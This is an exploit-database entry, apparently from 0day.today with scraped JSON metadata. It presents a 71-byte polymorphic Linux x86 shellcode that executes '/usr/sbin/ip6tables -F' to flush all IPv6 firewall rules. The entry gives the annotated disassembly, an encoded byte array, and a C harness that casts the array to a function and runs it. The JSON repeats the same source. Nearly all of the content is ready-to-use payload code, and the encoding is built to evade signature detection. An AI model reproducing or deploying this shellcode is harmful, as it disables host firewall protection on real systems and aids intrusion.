ID 1337DAY-ID-10169
Type zdt
Reporter Jonathan Salwan
Modified 2010-01-24T00:00:00
Description
Exploit for linux/x86 platform in category shellcode
=======================================================
linux/x86 polymorphic shellcode ip6tables -F - 71 bytes
=======================================================
/* Linux x86 - polymorphic shellcode ip6tables -F - 71 bytes
* Jonathan Salwan
*
*
* The Gnuser Project (Gnu Users Manager) => http://www.gnuser.org
*
* Disassembly of section .text:
*
* 08048054 <.text>:
* 8048054: 6a 0b push $0xb
* 8048056: 58 pop %eax
* 8048057: 99 cltd
* 8048058: 52 push %edx
* 8048059: 66 68 2d 46 pushw $0x462d
* 804805d: 89 e1 mov %esp,%ecx
* 804805f: 52 push %edx
* 8048060: 6a 73 push $0x73
* 8048062: 66 68 6c 65 pushw $0x656c
* 8048066: 68 36 74 61 62 push $0x62617436
* 804806b: 68 6e 2f 69 70 push $0x70692f6e
* 8048070: 68 2f 73 62 69 push $0x6962732f
* 8048075: 68 2f 75 73 72 push $0x7273752f
* 804807a: 89 e3 mov %esp,%ebx
* 804807c: 52 push %edx
* 804807d: 51 push %ecx
* 804807e: 53 push %ebx
* 804807f: 89 e1 mov %esp,%ecx
* 8048081: cd 80 int $0x80
*/
#include <stdio.h>
int main(int argc, char *argv[])
{
char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x47\x80"
"\x6c\x0e\xff\x01\x80\xe9\x01\x75"
"\xf6\xeb\x05\xe8\xea\xff\xff\xff"
"\x6b\x0c\x59\x9a\x53\x67\x69\x2e"
"\x47\x8a\xe2\x53\x6b\x74\x67\x69"
"\x6d\x66\x69\x37\x75\x62\x63\x69"
"\x6f\x30\x6a\x71\x69\x30\x74\x63"
"\x6a\x69\x30\x76\x74\x73\x8a\xe4"
"\x53\x52\x54\x8a\xe2\xce\x81";
fprintf(stdout,"Length: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();
}
# 0day.today [2018-01-06] #
{"id": "1337DAY-ID-10169", "bulletinFamily": "exploit", "title": "linux/x86 polymorphic shellcode ip6tables -F - 71 bytes", "description": "Exploit for linux/x86 platform in category shellcode", "published": "2010-01-24T00:00:00", "modified": "2010-01-24T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/10169", "reporter": "Jonathan Salwan", "references": [], "cvelist": [], "type": "zdt", "lastseen": "2018-01-06T05:03:03", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for linux/x86 platform in category shellcode", "edition": 1, "enchantments": {"score": {"modified": "2016-04-20T02:22:44", "value": 4.6}}, "hash": "95866b7e046a528b1f86d48a6510374681ce5a867dce8fdc944fbca2221ec38d", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "43b999db931eb702e36797d4c6ba3fa5", "key": "href"}, {"hash": "dd05701473954345b45a2fbf9864fc0f", "key": "title"}, {"hash": "76f6e2f1cc9bad8db927b1cafd3e1b21", "key": "reporter"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "12d6e97db87bdeb61f135d436bbfd6a0", "key": "modified"}, {"hash": "12d6e97db87bdeb61f135d436bbfd6a0", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "fa25d682ad8a858d1dd2b72d7aaca6ce", "key": "description"}, {"hash": "f986fd3d4bc29d02e231586e9010a5b0", "key": "sourceHref"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "42cd2e2f0d828285022375c8bc5c4c15", "key": "sourceData"}], "history": [], "href": "http://0day.today/exploit/description/10169", "id": "1337DAY-ID-10169", "lastseen": "2016-04-20T02:22:44", "modified": "2010-01-24T00:00:00", "objectVersion": "1.0", "published": "2010-01-24T00:00:00", "references": [], "reporter": "Jonathan Salwan", "sourceData": "=======================================================\r\nlinux/x86 polymorphic shellcode ip6tables -F - 71 bytes\r\n=======================================================\r\n\r\n\r\n/* Linux x86 - polymorphic shellcode ip6tables -F - 71 bytes\r\n * Jonathan Salwan \r\n *\r\n *\r\n * The Gnuser Project (Gnu Users Manager) => http://www.gnuser.org\r\n *\r\n * Disassembly of section .text:\r\n *\r\n * 08048054 <.text>:\r\n * 8048054: 6a 0b push $0xb\r\n * 8048056: 58 pop %eax\r\n * 8048057: 99 cltd \r\n * 8048058: 52 push %edx\r\n * 8048059: 66 68 2d 46 pushw $0x462d\r\n * 804805d: 89 e1 mov %esp,%ecx\r\n * 804805f: 52 push %edx\r\n * 8048060: 6a 73 push $0x73\r\n * 8048062: 66 68 6c 65 pushw $0x656c\r\n * 8048066: 68 36 74 61 62 push $0x62617436\r\n * 804806b: 68 6e 2f 69 70 push $0x70692f6e\r\n * 8048070: 68 2f 73 62 69 push $0x6962732f\r\n * 8048075: 68 2f 75 73 72 push $0x7273752f\r\n * 804807a: 89 e3 mov %esp,%ebx\r\n * 804807c: 52 push %edx\r\n * 804807d: 51 push %ecx\r\n * 804807e: 53 push %ebx\r\n * 804807f: 89 e1 mov %esp,%ecx\r\n * 8048081: cd 80 int $0x80\r\n*/\r\n \r\n#include <stdio.h>\r\n \r\nint main(int argc, char *argv[])\r\n{\r\nchar shellcode[] = \"\\xeb\\x11\\x5e\\x31\\xc9\\xb1\\x47\\x80\"\r\n \"\\x6c\\x0e\\xff\\x01\\x80\\xe9\\x01\\x75\"\r\n \"\\xf6\\xeb\\x05\\xe8\\xea\\xff\\xff\\xff\"\r\n \"\\x6b\\x0c\\x59\\x9a\\x53\\x67\\x69\\x2e\"\r\n \"\\x47\\x8a\\xe2\\x53\\x6b\\x74\\x67\\x69\"\r\n \"\\x6d\\x66\\x69\\x37\\x75\\x62\\x63\\x69\"\r\n \"\\x6f\\x30\\x6a\\x71\\x69\\x30\\x74\\x63\"\r\n \"\\x6a\\x69\\x30\\x76\\x74\\x73\\x8a\\xe4\"\r\n \"\\x53\\x52\\x54\\x8a\\xe2\\xce\\x81\";\r\n \r\n fprintf(stdout,\"Length: %d\\n\",strlen(shellcode));\r\n (*(void(*)()) shellcode)(); \r\n}\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "sourceHref": "http://0day.today/exploit/10169", "title": "linux/x86 polymorphic shellcode ip6tables -F - 71 bytes", "type": "zdt", "viewCount": 0}, "differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T02:22:44"}], "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "fa25d682ad8a858d1dd2b72d7aaca6ce"}, {"key": "href", "hash": "7d53f22a2f6915ea24e8585318961447"}, {"key": "modified", "hash": "12d6e97db87bdeb61f135d436bbfd6a0"}, {"key": "published", "hash": "12d6e97db87bdeb61f135d436bbfd6a0"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "76f6e2f1cc9bad8db927b1cafd3e1b21"}, {"key": "sourceData", "hash": "806ca1f4628c431eb4589f616b68ce98"}, {"key": "sourceHref", "hash": "7cd748f18e12e0cf62fbe06033644a9d"}, {"key": "title", "hash": "dd05701473954345b45a2fbf9864fc0f"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "hash": "ddb7946c64ead789a658ff56deb4b6395928b5cd2ee357fd1bb58b1755bcf2d4", "viewCount": 0, "enchantments": {"vulnersScore": 5.0}, "objectVersion": "1.3", "sourceHref": "https://0day.today/exploit/10169", "sourceData": "=======================================================\r\nlinux/x86 polymorphic shellcode ip6tables -F - 71 bytes\r\n=======================================================\r\n\r\n\r\n/* Linux x86 - polymorphic shellcode ip6tables -F - 71 bytes\r\n * Jonathan Salwan \r\n *\r\n *\r\n * The Gnuser Project (Gnu Users Manager) => http://www.gnuser.org\r\n *\r\n * Disassembly of section .text:\r\n *\r\n * 08048054 <.text>:\r\n * 8048054: 6a 0b push $0xb\r\n * 8048056: 58 pop %eax\r\n * 8048057: 99 cltd \r\n * 8048058: 52 push %edx\r\n * 8048059: 66 68 2d 46 pushw $0x462d\r\n * 804805d: 89 e1 mov %esp,%ecx\r\n * 804805f: 52 push %edx\r\n * 8048060: 6a 73 push $0x73\r\n * 8048062: 66 68 6c 65 pushw $0x656c\r\n * 8048066: 68 36 74 61 62 push $0x62617436\r\n * 804806b: 68 6e 2f 69 70 push $0x70692f6e\r\n * 8048070: 68 2f 73 62 69 push $0x6962732f\r\n * 8048075: 68 2f 75 73 72 push $0x7273752f\r\n * 804807a: 89 e3 mov %esp,%ebx\r\n * 804807c: 52 push %edx\r\n * 804807d: 51 push %ecx\r\n * 804807e: 53 push %ebx\r\n * 804807f: 89 e1 mov %esp,%ecx\r\n * 8048081: cd 80 int $0x80\r\n*/\r\n \r\n#include <stdio.h>\r\n \r\nint main(int argc, char *argv[])\r\n{\r\nchar shellcode[] = \"\\xeb\\x11\\x5e\\x31\\xc9\\xb1\\x47\\x80\"\r\n \"\\x6c\\x0e\\xff\\x01\\x80\\xe9\\x01\\x75\"\r\n \"\\xf6\\xeb\\x05\\xe8\\xea\\xff\\xff\\xff\"\r\n \"\\x6b\\x0c\\x59\\x9a\\x53\\x67\\x69\\x2e\"\r\n \"\\x47\\x8a\\xe2\\x53\\x6b\\x74\\x67\\x69\"\r\n \"\\x6d\\x66\\x69\\x37\\x75\\x62\\x63\\x69\"\r\n \"\\x6f\\x30\\x6a\\x71\\x69\\x30\\x74\\x63\"\r\n \"\\x6a\\x69\\x30\\x76\\x74\\x73\\x8a\\xe4\"\r\n \"\\x53\\x52\\x54\\x8a\\xe2\\xce\\x81\";\r\n \r\n fprintf(stdout,\"Length: %d\\n\",strlen(shellcode));\r\n (*(void(*)()) shellcode)(); \r\n}\r\n\r\n\r\n\n# 0day.today [2018-01-06] #"}
{"result": {}}